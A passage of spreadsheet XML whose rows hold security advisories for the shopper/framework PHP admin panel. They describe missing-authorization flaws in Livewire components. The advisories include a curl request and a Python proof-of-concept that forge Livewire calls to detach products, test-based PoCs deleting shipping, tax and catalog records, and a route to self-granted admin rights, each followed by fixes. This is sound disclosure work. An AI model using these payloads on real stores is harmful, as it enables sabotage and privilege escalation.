      <c r="G918" s="5" t="inlineStr"/>
      <c r="H918" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I918" s="5" t="inlineStr"/>
      <c r="J918" s="5" t="inlineStr"/>
      <c r="K918" s="5" t="inlineStr"/>
      <c r="L918" s="5" t="inlineStr">
        <is>
          <t>composer:shopper/framework</t>
        </is>
      </c>
      <c r="M918" s="5" t="inlineStr">
        <is>
          <t>2.9.2</t>
        </is>
      </c>
      <c r="N918" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O918" s="5" t="inlineStr"/>
      <c r="P918" s="5" t="inlineStr"/>
      <c r="Q918" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R918" s="5" t="inlineStr">
        <is>
          <t>## Title
Missing authorization on product removal actions in CollectionProducts component
## Description
A lack of authorization control was discovered on both the per-record delete action and the bulk delete action inside `packages/admin/src/Livewire/Components/Collection/CollectionProducts.php`. Neither the `Action::make('delete')` at line 73 nor the `DeleteBulkAction::make()` at line 91 carries an `-&gt;authorize(...)` chain. The component also exposes `public Collection $collection` without `#[Locked]`, so the collection ID is mutable in the Livewire wire payload. Any authenticated admin-panel session, including staff who hold only `browse_collections`, can detach individual products or bulk-detach all products from any collection in the database.
## Severity
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H  Score: 8.1  (High)
## Affected files
- `packages/admin/src/Livewire/Components/Collection/CollectionProducts.php:40,73-88,91-105`
```php
// Line 40 - client-mutable, no #[Locked]
public Collection $collection;
// Lines 73-88 - per-record delete action, no -&gt;authorize(...)
-&gt;recordActions([
    Action::make('delete')
        -&gt;label(__('shopper::forms.actions.delete'))
        -&gt;icon(Untitledui::Trash03)
        -&gt;iconButton()
        -&gt;color('danger')
        -&gt;requiresConfirmation()
        -&gt;action(function (Product $record): void {
            $this-&gt;collection-&gt;products()-&gt;detach([$record-&gt;id]);
            $this-&gt;dispatch('collection.add.product');
            Notification::make()
                -&gt;title(__('shopper::pages/collections.remove_product'))
                -&gt;success()
                -&gt;send();
        }),
])
// Lines 91-105 - bulk remove action, no -&gt;authorize(...)
-&gt;groupedBulkActions([
    DeleteBulkAction::make()
        -&gt;label(__('shopper::forms.actions.delete'))
        -&gt;icon(Untitledui::Trash03)
        -&gt;requiresConfirmation()
        -&gt;action(function (EloquentCollection $records): void {
            $this-&gt;collection-&gt;products()-&gt;detach($records-&gt;pluck('id')-&gt;toArray());
            $this-&gt;dispatch('collection.add.product');
            Notification::make()
                -&gt;title(__('shopper::pages/collections.remove_product'))
                -&gt;success()
                -&gt;send();
        })
        -&gt;deselectRecordsAfterCompletion(),
])
```
## Steps to reproduce
Prerequisites: any admin-panel account, including one whose role holds only `browse_collections` (no `edit_collections` required).
```bash
SESSION="laravel_session=&lt;your_session_value&gt;"
XSRF="X-XSRF-TOKEN: &lt;url-decoded-value-of-XSRF-TOKEN-cookie&gt;"
# Step 1: Note the collection ID you wish to empty (e.g., collection_id=5).
# Step 2: Call the bulk table action on the CollectionProducts component,
#          substituting collection ID 5 in the component state.
curl -s -X POST http://localhost/shopper/livewire/update \
  -H "Content-Type: application/json" \
  -H "X-XSRF-TOKEN: $XSRF" \
  -H "Cookie: $SESSION" \
  -H "X-Livewire: 1" \
  -d '{
    "components": [{
      "snapshot": "{\"id\":\"COLLECTION_PRODUCTS_COMPONENT_ID\",\"data\":{\"collection\":5},\"checksum\":\"...\"}",
      "updates": {},
      "calls": [{
        "path": "",
        "method": "callBulkAction",
        "params": ["delete", [1, 2, 3, 4, 5]]
      }]
    }]
  }'
# Expected: HTTP 200, all listed product IDs detached from collection 5,
#           regardless of the caller having only browse_collections.
```
## Proof of concept
```python
#!/usr/bin/env python3
"""
CollectionProducts authorization bypass PoC.
Set these environment variables before running:
  BASE_URL        e.g. http://localhost
  SESSION_COOKIE  value of the laravel_session cookie
  XSRF_TOKEN      URL-decoded value of the XSRF-TOKEN cookie
  COMPONENT_ID    Livewire component snapshot ID (from page source)
  COLLECTION_ID   integer ID of the target collection
  PRODUCT_IDS     comma-separated product IDs to detach (e.g. "1,2,3")
"""
import json
import os
import requests
base_url      = os.environ['BASE_URL']
session       = os.environ['SESSION_COOKIE']
xsrf          = os.environ['XSRF_TOKEN']
component_id  = os.environ['COMPONENT_ID']
collection_id = int(os.environ['COLLECTION_ID'])
product_ids   = [int(x) for x in os.environ['PRODUCT_IDS'].split(',')]
headers = {
    'Content-Type': 'application/json',
    'Accept': 'text/html, application/xhtml+xml',
    'X-XSRF-TOKEN': xsrf,
    'Cookie': f'laravel_session={session}',
    'X-Livewire': '1',
}
snapshot = json.dumps({
    'id': component_id,
    'data': {'collection': collection_id},
    'checksum': 'UNLOCKED_PROP_NO_CHECKSUM_NEEDED',
})
payload = {
    'components': [{
        'snapshot': snapshot,
        'updates': {},
        'calls': [{
            'path': '',
            'method': 'callBulkAction',
            'params': ['delete', product_ids],
        }]
    }]
}
r = requests.post(f'{base_url}/shopper/livewire/update', headers=headers, json=payload)
print(f'Status: {r.status_code}')
print(r.text[:500])
```
## Impact
A staff member holding only `browse_collections` can silently empty any collection by detaching all of its products. Collections drive storefront catalog grouping; removing products from a collection breaks the associated landing pages and promotions for those product groups. Because `$collection` is not locked, the attacker is not limited to the collection they navigated to: they can target any collection ID in the database, including featured promotional collections they have never viewed.
## Suggested fix
```php
// packages/admin/src/Livewire/Components/Collection/CollectionProducts.php
use Livewire\Attributes\Locked;
#[Locked]                          // prevent client-side ID substitution
public Collection $collection;
// Per-record action:
Action::make('delete')
    -&gt;authorize('edit_collections')  // add this
    -&gt;action(function (Product $record): void {
        $this-&gt;collection-&gt;products()-&gt;detach([$record-&gt;id]);
        // ...
    }),
// Bulk action:
DeleteBulkAction::make()
    -&gt;authorize('edit_collections')  // add this
    -&gt;action(function (EloquentCollection $records): void {
        $this-&gt;collection-&gt;products()-&gt;detach($records-&gt;pluck('id')-&gt;toArray());
        // ...
    })
```
## Credits
Reported by Vishal Shukla ([@shukla304](https://github.com/shukla304) / [@therawdev](https://github.com/therawdev)).</t>
        </is>
      </c>
      <c r="S918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56825</t>
        </is>
      </c>
    </row>
    <row r="919">
      <c r="A919" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B919" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56826</t>
        </is>
      </c>
      <c r="D919" s="5" t="inlineStr"/>
      <c r="E919" s="5" t="inlineStr"/>
      <c r="F919" s="5" t="inlineStr"/>
      <c r="G919" s="5" t="inlineStr"/>
      <c r="H919" s="5" t="inlineStr"/>
      <c r="I919" s="5" t="inlineStr"/>
      <c r="J919" s="5" t="inlineStr"/>
      <c r="K919" s="5" t="inlineStr"/>
      <c r="L919" s="5" t="inlineStr">
        <is>
          <t>composer:shopper/framework</t>
        </is>
      </c>
      <c r="M919" s="5" t="inlineStr">
        <is>
          <t>2.9.2</t>
        </is>
      </c>
      <c r="N919" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O919" s="5" t="inlineStr"/>
      <c r="P919" s="5" t="inlineStr"/>
      <c r="Q919" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R919" s="5" t="inlineStr">
        <is>
          <t>## Summary
Four Livewire components in the Settings area expose destructive Filament actions (`delete` / `edit`) that perform **no server-side authorization**. Any authenticated user who can reach the Settings pages — i.e. holding only the coarse `access_setting` permission, **without** being an admin and **without** any `delete_*`/`edit_*` permission — can delete tax zones, tax rates, shipping zones, and carrier (shipping-rate) options by invoking the component action directly over the Livewire endpoint.
These records sit on the storefront checkout path, so deleting them breaks shipping-rate calculation, removes region-scoped payment methods, and corrupts tax resolution at checkout.
This is inconsistent with the rest of the admin, where destructive actions are gated by granular permissions (e.g. `Settings/Locations/Index` uses `-&gt;authorize('delete_inventories')`, and `Order/Detail` gates mutating actions with `edit_orders`).
## Affected components
| Component | File | Unauthorized action |
|---|---|---|
| `Settings\Zones\ZoneShippingOptions` | `packages/admin/src/Livewire/Components/Settings/Zones/ZoneShippingOptions.php:47` | `delete` → `CarrierOption::query()-&gt;find($arguments['id'])-&gt;delete()` (id is client-supplied) |
| `Settings\Zones\Detail` | `packages/admin/src/Livewire/Components/Settings/Zones/Detail.php:46` | `delete` → `DeleteAction` on the bound `Zone` |
| `Settings\Taxes\Detail` | `packages/admin/src/Livewire/Components/Settings/Taxes/Detail.php:42` | `delete` → `DeleteAction` on the bound `TaxZone` |
| `Settings\Taxes\TaxRates` | `packages/admin/src/Livewire/Components/Settings/Taxes/TaxRates.php:97` | `delete` → `DeleteAction` on a `TaxRate` |
Each file contains **zero** `authorize` calls, and the actions declare neither `-&gt;authorize()` nor an enforced `-&gt;visible()` guard.
## Details
The Settings pages mount these as child Livewire components. The parent page authorizes `access_setting` (e.g. `Pages/Settings/Taxes.php:29`), but the child components do not re-check authorization, and their destructive actions carry no `-&gt;authorize()`. Because each Livewire component handles its own `/livewire/update` requests, the action executes purely on the page-level `access_setting` gate — there is no per-resource permission, and `delete_zones` / `delete_taxes` permissions are never even generated by the seeder (`packages/admin/database/seeders/PermissionsTableSeeder.php`).
`ZoneShippingOptions::deleteAction()` is the clearest case — it deletes by an id taken straight from the client action arguments with no scoping and no permission check:
```php
// packages/admin/src/Livewire/Components/Settings/Zones/ZoneShippingOptions.php
public function deleteAction(): Action
{
    return Action::make('delete')
        -&gt;requiresConfirmation()
        // ... no -&gt;authorize(), no -&gt;visible()
        -&gt;action(function (array $arguments): void {
            CarrierOption::query()-&gt;find($arguments['id'])-&gt;delete();   // client-controlled id
            // ...
        });
}
```
## Proof of Concept
Confirmed with the project's own test harness (Pest + Orchestra Testbench, SQLite) — the real Livewire/Filament code path, executed as a non-admin user holding only `access_setting`.
```php
use Livewire\Livewire;
use Shopper\Core\Models\{CarrierOption, Zone};
use Shopper\Livewire\Components\Settings\Zones\ZoneShippingOptions;
use Tests\Core\Stubs\User;
uses(Tests\Admin\TestCase::class);
it('low-priv access_setting user deletes a CarrierOption with no authorization', function (): void {
    $attacker = User::factory()-&gt;create();
    $attacker-&gt;givePermissionTo('access_setting');          // NOT admin, NO delete_* permission
    $this-&gt;actingAs($attacker, config('shopper.auth.guard'));
    $zone   = Zone::factory()-&gt;create();
    $option = CarrierOption::factory()-&gt;create(['zone_id' =&gt; $zone-&gt;id]);
    Livewire::test(ZoneShippingOptions::class, ['selectedZoneId' =&gt; $zone-&gt;id])
        -&gt;callAction('delete', arguments: ['id' =&gt; $option-&gt;id]);
    expect(CarrierOption::query()-&gt;find($option-&gt;id))-&gt;toBeNull();   // deleted -&gt; vulnerable
});
```
Result:
```
Attacker: isAdmin()=false, can('access_setting')=true, can('delete_zones')=false, can('edit_zones')=false
[BEFORE] CarrierOption count = 1  (target #1 'DHL Express' exists = YES)
[ATTACK] callAction('delete', id=1) on ZoneShippingOptions
[AFTER ] CarrierOption count = 0  (target #1 exists = NO -&gt; deleted)
PASS  3 passed (11 assertions)
  ✓ CONTROL — Order/Detail::markPaid is correctly hidden without edit_orders (harness enforces declared authz)
  ✓ a CarrierOption is deleted by the low-priv user
  ✓ a shipping Zone is deleted by the low-priv user
```
The CONTROL case rules out a false positive: the same harness correctly denies `Order/Detail::markPaid` for a user lacking `edit_orders`, proving authorization is enforced when a component declares it — these four components simply declare none.
## Impact
A low-privileged staff member (or a compromised low-privileged account) can sabotage the storefront's checkout/revenue path without any delete permission:
- **Delete a `CarrierOption`** → that shipping rate disappears from checkout for the zone.
- **Delete a `Zone`** → removes the country → carrier/payment-method/currency mapping; customers shipping to those countries lose all shipping and payment options (`CarrierRateService::getRatesForZone` / `getManualRates` read these directly).
- **Delete a `TaxZone` / `TaxRate`** → `TaxCalculator::resolveZone()` can no longer resolve the zone, corrupting tax calculation at checkout.
Net effect: integrity and availability damage to live commerce configuration, performed by a principal who was never granted that authority (least-privilege violation).
## Secondary issue found while reproducing
`Zones\Detail::deleteAction()-&gt;after()` calls `$this-&gt;reset('zone')`, but `zone` is a `#[Computed]` method (not a property), so it throws `ReflectionException` **after** the row is deleted. Worth fixing alongside the authorization gap.
## Suggested remediation
Add an authorization check to each action, and ideally a `mount()` guard on each child component, matching the pattern already used in `Settings/Locations/Index.php` and `Team/RolePermission.php`:
```php
public function deleteAction(): Action
{
    return Action::make('delete')
        -&gt;authorize('access_setting')   // or a new granular delete_zones / delete_taxes permission
        -&gt;requiresConfirmation()
        // ...
}
```
Apply to the `delete` (and `edit`) actions in all four components. Consider also generating granular `*_zones` / `*_taxes` permissions so settings access can follow least privilege, and fix the `$this-&gt;reset('zone')` call in `Zones\Detail`.</t>
        </is>
      </c>
      <c r="S919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56826</t>
        </is>
      </c>
    </row>
    <row r="920">
      <c r="A920" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B920" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56827</t>
        </is>
      </c>
      <c r="D920" s="5" t="inlineStr"/>
      <c r="E920" s="5" t="inlineStr"/>
      <c r="F920" s="5" t="inlineStr"/>
      <c r="G920" s="5" t="inlineStr"/>
      <c r="H920" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I920" s="5" t="inlineStr"/>
      <c r="J920" s="5" t="inlineStr"/>
      <c r="K920" s="5" t="inlineStr"/>
      <c r="L920" s="5" t="inlineStr">
        <is>
          <t>composer:shopper/framework</t>
        </is>
      </c>
      <c r="M920" s="5" t="inlineStr">
        <is>
          <t>2.9.2</t>
        </is>
      </c>
      <c r="N920" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O920" s="5" t="inlineStr"/>
      <c r="P920" s="5" t="inlineStr"/>
      <c r="Q920" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R920" s="5" t="inlineStr">
        <is>
          <t>## Summary
Five Filament `groupedBulkActions` blocks across the Shopper admin Livewire pages omit the `-&gt;authorize(...)` permission gate, while their per-record sibling actions (and other Shopper Index pages such as `Pages/Settings/Currencies.php`, `Pages/Reviews/Index.php`, `Pages/Collection/Index.php`, and `Pages/Discount/Index.php`) correctly chain `-&gt;authorize(...)`. Each affected page's `mount()` only requires the read-only `browse_*` permission, so a low-privilege staff user holding only the read permission can drive the bulk endpoint via the standard Livewire `callTableBulkAction` flow and execute state-mutating operations they were never granted. The vulnerability is the same class as GHSA-f946-9qp6-vgch and GHSA-j328-xmgp-j4q3 (read-only permission gating a write action), just on a different surface (Filament 4 `groupedBulkActions` rather than top-level Livewire methods).
A staff user holding only `browse_attributes` can permanently delete every product attribute in the catalog (cascading break of every dependent product variant). A user holding only `browse_tags` can permanently delete every product tag. Users holding `browse_brands`, `browse_categories`, or `browse_suppliers` can flip the visibility (`is_enabled`) of every brand/category/supplier in bulk, sabotaging storefront catalog visibility.
CVSS 3.1: `AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H` = 8.1 High. CWE-285 (Improper Authorization) and CWE-862 (Missing Authorization). The attacker has low privilege (browse-only staff role), no user interaction, network reachable.
## Vulnerable components (paths relative to repo root)
All references are HEAD = commit `ac9a760` on `master` (the very commit that closed the previous wave of authorization-drift bugs from GHSA-j328-xmgp-j4q3).
### 1) `packages/admin/src/Livewire/Pages/Attribute/Browse.php`
Mount at line 36–39 requires only `browse_attributes`.
- Lines 106–122: `DeleteBulkAction::make()` has NO `-&gt;authorize(...)` chain (the surrounding per-record `delete` action at lines 95–104 correctly does `-&gt;authorize('delete_attributes')`).
- Lines 123–138: `BulkAction::make('enabled')` has NO `-&gt;authorize(...)`.
- Lines 139–155: `BulkAction::make('disabled')` has NO `-&gt;authorize(...)`.
Net effect: a `browse_attributes`-only user can **delete every row in the attributes table**, and toggle `is_enabled` on every attribute in one request. Deleting an attribute cascades into every product variant that references it via the `attribute_product` pivot.
### 2) `packages/admin/src/Livewire/Pages/Tag/Index.php`
Mount at line 39 requires only `browse_tags`.
- Lines 96–108: `DeleteBulkAction::make()` has NO `-&gt;authorize(...)` chain (the per-record `delete` action at lines 79–94 correctly does `-&gt;authorize('delete_tags')`).
Net effect: a `browse_tags`-only user can delete every `ProductTag` row.
### 3) `packages/admin/src/Livewire/Pages/Brand/Index.php`
Mount at line 37–40 requires only `browse_brands`.
- Lines 97–112: `BulkAction::make('enabled')` has NO `-&gt;authorize(...)`.
- Lines 113–129: `BulkAction::make('disabled')` has NO `-&gt;authorize(...)`.
Net effect: a `browse_brands`-only user can flip `is_enabled` on every brand. Disabling all brands removes them from the storefront catalog. The per-record edit/delete actions and the `DeleteBulkAction` at lines 130–148 are correctly `-&gt;authorize(...)` gated — only the visibility bulk actions were missed.
### 4) `packages/admin/src/Livewire/Pages/Category/Index.php`
Mount at line 38–41 requires only `browse_categories`.
- Lines 102–117: `BulkAction::make('enabled')` has NO `-&gt;authorize(...)`.
- Lines 118–133: `BulkAction::make('disabled')` has NO `-&gt;authorize(...)`.
Net effect: a `browse_categories`-only user can flip `is_enabled` on every category. Same shape as Brand.
### 5) `packages/admin/src/Livewire/Pages/Supplier/Index.php`
Mount at line 38 requires only `browse_suppliers`.
- Lines 93–108: `BulkAction::make('enabled')` has NO `-&gt;authorize(...)`.
- Lines 109–125: `BulkAction::make('disabled')` has NO `-&gt;authorize(...)`.
Net effect: a `browse_suppliers`-only user can flip `is_enabled` on every supplier.
## Reference comparison: places that ARE correctly gated
For reference, here is what the same pattern looks like in files that DID get the fix:
- `packages/admin/src/Livewire/Pages/Settings/Currencies.php` lines 90–129: every `BulkAction` chains `-&gt;authorize('access_setting')`.
- `packages/admin/src/Livewire/Pages/Reviews/Index.php` lines 105–119: `DeleteBulkAction` chains `-&gt;authorize('delete_reviews')`.
- `packages/admin/src/Livewire/Pages/Collection/Index.php` lines 109–128: `DeleteBulkAction` chains `-&gt;authorize('delete_collections')`.
- `packages/admin/src/Livewire/Pages/Discount/Index.php` lines 126–145: `DeleteBulkAction` chains `-&gt;authorize('delete_discounts')`.
The convention is established and applied elsewhere — these five files just missed it.
## Proof of Concept
The attached file `tests/Admin/Livewire/Pages/Brand/AuthBypassPocTest.php` (added in this report) contains seven Pest tests, each acting as a `browse_*`-only staff user and invoking the bulk endpoint. All seven pass on master @ `ac9a760`:
```
   PASS  Tests\Admin\Livewire\Pages\Brand\AuthBypassPocTest
  ✓ it SHOPPER-2 PoC: read-only viewer can mass-DISABLE all brands via unguarded BulkAction
  ✓ it SHOPPER-2 PoC: read-only viewer can mass-ENABLE all brands via unguarded BulkAction
  ✓ it SHOPPER-2 PoC: read-only viewer can mass-DISABLE all categories via unguarded BulkAction
  ✓ it SHOPPER-2 PoC: read-only viewer can mass-DISABLE all suppliers via unguarded BulkAction
  ✓ it SHOPPER-2 PoC: read-only viewer can DELETE all attributes via unguarded DeleteBulkAction
  ✓ it SHOPPER-2 PoC: read-only viewer can mass-DISABLE all attributes via unguarded BulkAction
  ✓ it SHOPPER-2 PoC: browse_tags viewer can DELETE all product tags via unguarded DeleteBulkAction
  Tests:    7 passed (32 assertions)
```
Each test seeds three records, signs in a user holding only the corresponding `browse_*` permission, calls `Livewire::test(&lt;Page&gt;::class)-&gt;callTableBulkAction(...)`, and asserts the side effect (records flipped or deleted). For example, the attribute mass-delete test:
```php
$this-&gt;viewer = User::factory()-&gt;create();
$this-&gt;viewer-&gt;givePermissionTo('browse_attributes');
$this-&gt;actingAs($this-&gt;viewer);
Attribute::factory()-&gt;count(3)-&gt;create();
expect($this-&gt;viewer-&gt;can('delete_attributes'))-&gt;toBeFalse();
Livewire::test(AttributeBrowse::class)
    -&gt;callTableBulkAction(\Filament\Actions\DeleteBulkAction::class, Attribute::pluck('id')-&gt;toArray())
    -&gt;assertHasNoErrors();
expect(Attribute::count())-&gt;toBe(0);
```
The call uses the same `callTableBulkAction` helper Shopper's own test suite uses everywhere, which in turn drives the same Livewire `update` payload the browser would emit — so this is a faithful HTTP-level reproduction.
## Suggested fix
Add `-&gt;authorize(&lt;correct_permission&gt;)` to each of the five vulnerable groups, mirroring the pattern already used elsewhere:
```diff
 // Pages/Attribute/Browse.php
 -&gt;groupedBulkActions([
     DeleteBulkAction::make()
+        -&gt;authorize('delete_attributes')
         -&gt;label(__('shopper::forms.actions.delete'))
         -&gt;requiresConfirmation()
         -&gt;action(function (Collection $records): void { /* ... */ }),
     BulkAction::make('enabled')
+        -&gt;authorize('edit_attributes')
         -&gt;label(__('shopper::forms.actions.enable'))
         -&gt;action(function (Collection $records): void { /* ... */ }),
     BulkAction::make('disabled')
+        -&gt;authorize('edit_attributes')
         -&gt;label(__('shopper::forms.actions.disable'))
         -&gt;action(function (Collection $records): void { /* ... */ }),
 ])
```
Apply the equivalent change to `Pages/Tag/Index.php` (`delete_tags`), `Pages/Brand/Index.php` (`edit_brands` for enable/disable), `Pages/Category/Index.php` (`edit_categories`), and `Pages/Supplier/Index.php` (`edit_suppliers`).
A regression test for each file (acting as a `browse_*`-only user and expecting `assertHasErrors`/`AuthorizationException`) would lock in the fix, matching the regression tests added for #514.
## Resources
- Prior advisories of the same class (read-only permission gating a write action): GHSA-f946-9qp6-vgch, GHSA-j328-xmgp-j4q3 / GHSA-vw82-3966-f9mr.
- Same-shape fix: commit `ac9a760` (PR #514). Five Filament bulk-action groups did not receive the corresponding `-&gt;authorize(...)` chain.
- CWE-285 Improper Authorization, CWE-862 Missing Authorization.
### Credits
Reported by Vishal Shukla(@shukla304) using sechub.dev AI Agent
### Support
If this disclosure was useful and userswould like to support continued open-source security research and responsible-disclosure work, they can sponsor at https://github.com/sponsors/therawdev — Shopper is thankful for those keeping open source safe.</t>
        </is>
      </c>
      <c r="S920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56827</t>
        </is>
      </c>
    </row>
    <row r="921">
      <c r="A921" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B921" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56828</t>
        </is>
      </c>
      <c r="D921" s="5" t="inlineStr"/>
      <c r="E921" s="5" t="inlineStr"/>
      <c r="F921" s="5" t="inlineStr"/>
      <c r="G921" s="5" t="inlineStr"/>
      <c r="H921" s="5" t="inlineStr"/>
      <c r="I921" s="5" t="inlineStr"/>
      <c r="J921" s="5" t="inlineStr"/>
      <c r="K921" s="5" t="inlineStr"/>
      <c r="L921" s="5" t="inlineStr">
        <is>
          <t>composer:shopper/framework</t>
        </is>
      </c>
      <c r="M921" s="5" t="inlineStr">
        <is>
          <t>2.9.2</t>
        </is>
      </c>
      <c r="N921" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O921" s="5" t="inlineStr"/>
      <c r="P921" s="5" t="inlineStr"/>
      <c r="Q921" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-862</t>
        </is>
      </c>
      <c r="R921" s="5" t="inlineStr">
        <is>
          <t>## Summary
Three Livewire admin components in `shopper/framework` (latest master at commit `fcd0c59`, released as v2.8.0) gate state-mutating actions on the read-only `view_users` permission. This is the same class as the issue Shopper fixed in v2.8.0 / PR #511 / [GHSA-f946-9qp6-vgch](https://github.com/shopperlabs/shopper/security/advisories/GHSA-f946-9qp6-vgch) — the PR moved most write actions from `view_users` to `access_setting`, but three were missed (one of them is a brand-new file added by the security commit itself).
A staff user holding only `view_users` + `access_dashboard` (a realistic "support" or "viewer" role per Shopper's own `PermissionsTableSeeder`) can: (1) self-escalate by granting any permission to their own role; (2) create a brand-new admin team member with a chosen password and the `admin` role and then log in as that user; (3) delete arbitrary `permissions` rows (RBAC DoS) or — when `can_be_removed=true` — delete entire roles.
CVSS 3.1: `AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` = 8.8 (High). CWE-285 (Improper Authorization) + CWE-862 (Missing Authorization).
## Vulnerable components (paths relative to repo root)
### 1) `packages/admin/src/Livewire/Components/Settings/Team/Permissions.php`
- `togglePermission(int $id)` at line 28 calls `$this-&gt;authorize('view_users');`
- `removePermission(int $id)` at line 55 calls `$this-&gt;authorize('view_users');`
The Permissions blade at `packages/admin/resources/views/livewire/components/settings/team/permissions.blade.php` line 34 emits every permission's `id` directly in `wire:click` handlers, so the attacker does not even need to guess IDs — the page itself enumerates them.
Net effect: any user who can mount the Permissions component (gated on `view_users`) can grant any permission row to the bound `$role`. Granting `access_setting` to the attacker's own role unlocks every action that PR #511 supposedly hardened with `-&gt;authorize('access_setting')`. Granting `delete_customers`, `edit_orders`, `edit_products`, `add_brands`, etc. is direct data-modification escalation.
### 2) `packages/admin/src/Livewire/SlideOvers/CreateTeamMember.php`
- `mount()` at line 53 calls `$this-&gt;authorize('view_users');`
- `store()` at line 122 calls `$this-&gt;authorize('view_users');`
This file is `new file mode 100755` in commit `fcd0c59` — it was created as part of the security fix and inherited the same misclassified gate.
`store()` creates a `User` with `email_verified_at = now()`, the attacker's chosen password, and any selected `role_id`. The `Radio::make('role_id')` options filter only excludes `config('shopper.admin.roles.user')`, so the `admin` role is selectable. Log out, log in as the new account → full admin.
### 3) `packages/admin/src/Livewire/Pages/Settings/Team/RolePermission.php`
- `deleteAction` at lines 81-90: only gated by `-&gt;visible($this-&gt;role-&gt;can_be_removed)`, with no `-&gt;authorize()` chain.
Page-level `mount` (line 52) requires only `view_users`. For any role with `can_be_removed = true`, a `view_users`-only user can call the action and delete the role (cascading the loss of permissions for every assigned user).
## Self-confirmation in the project's own test suite
The following tests are green on master @ `fcd0c59` — they ARE the PoC:
```
tests/Admin/Livewire/Components/Settings/Team/PermissionsTest.php
  line 14-16: `givePermissionTo('view_users')` only
  line 36-45: "can toggle permission to role" — passes
  line 74-85: "can remove permission" — passes
tests/Admin/Livewire/SlideOvers/CreateTeamMemberTest.php
  line 16-18: `givePermissionTo('view_users')` only
  line 29-56: "can create new team member" — passes, asserts the new user `hasRole('manager')`
```
A `view_users`-only Livewire user actor successfully toggles permissions, removes permissions, and creates a new privileged user — verified by Shopper's own regression tests.
## Suggested fix
Change `$this-&gt;authorize('view_users')` to `$this-&gt;authorize('access_setting')` in:
- `Permissions::togglePermission`
- `Permissions::removePermission`
- `Permissions::mount` (defence in depth, matches `Team\Index`)
- `CreateTeamMember::mount`
- `CreateTeamMember::store`
Add `-&gt;authorize('access_setting')` to `RolePermission::deleteAction` (matches the pattern already applied to `generatePermissionsAction`, `createPermissionAction`, and `Team\Index::DeleteAction`).
Update the two regression tests to use `access_setting` instead of `view_users` so they accurately reflect the privilege boundary.
## Resources
- Prior advisory of the same class: https://github.com/shopperlabs/shopper/security/advisories/GHSA-f946-9qp6-vgch
- Fix commit that introduced these residual gaps: https://github.com/shopperlabs/shopper/commit/fcd0c5920588702df5b874f432b1042abd77a50b
- CWE-285 Improper Authorization
- CWE-862 Missing Authorization
### Credits
Reported by Vishal Shukla(@shukla304) using sechub.dev AI Agent
### Support
If this disclosure was useful and if users would like to support continued open-source security research and responsible-disclosure work, they can sponsor at https://github.com/sponsors/therawdev — Shoppers thanks those who keeping open source safe.</t>
        </is>
      </c>
      <c r="S921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56828</t>
        </is>
      </c>
    </row>
    <row r="922">
      <c r="A922" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B922" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56829</t>
        </is>
      </c>
      <c r="D922" s="5" t="inlineStr"/>
      <c r="E922" s="5" t="inlineStr"/>
      <c r="F922" s="5" t="inlineStr"/>
      <c r="G922" s="5" t="inlineStr"/>
      <c r="H922" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I922" s="5" t="inlineStr"/>
      <c r="J922" s="5" t="inlineStr"/>
      <c r="K922" s="5" t="inlineStr"/>
      <c r="L922" s="5" t="inlineStr">
        <is>
          <t>composer:shopper/framework</t>
        </is>
      </c>
      <c r="M922" s="5" t="inlineStr">
        <is>
          <t>2.9.2</t>
        </is>
      </c>
      <c r="N922" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O922" s="5" t="inlineStr"/>
      <c r="P922" s="5" t="inlineStr"/>
      <c r="Q922" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R922" s="5" t="inlineStr">
        <is>
          <t>## Title
Unauthorized inventory stock manipulation via unlocked variant property in VariantStock component
## Description
A lack of authorization control was discovered in the `stockAction()` method in `packages/admin/src/Livewire/Components/Products/VariantStock.php`. The component exposes a `public $variant` property without the `#[Locked]` attribute, so the variant ID is client-mutable via the Livewire wire payload. The `stockAction()` returns an Action with no `-&gt;authorize(...)` chain, meaning any authenticated admin-panel session, including browse-only staff who hold zero edit permissions, can call this action to adjust inventory levels for any product variant. The combination of missing authorization and an unlocked model binding lets the attacker both bypass the permission gate and redirect the mutation to an arbitrary variant in the database.
## Severity
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H  Score: 8.1  (High)
## Affected files
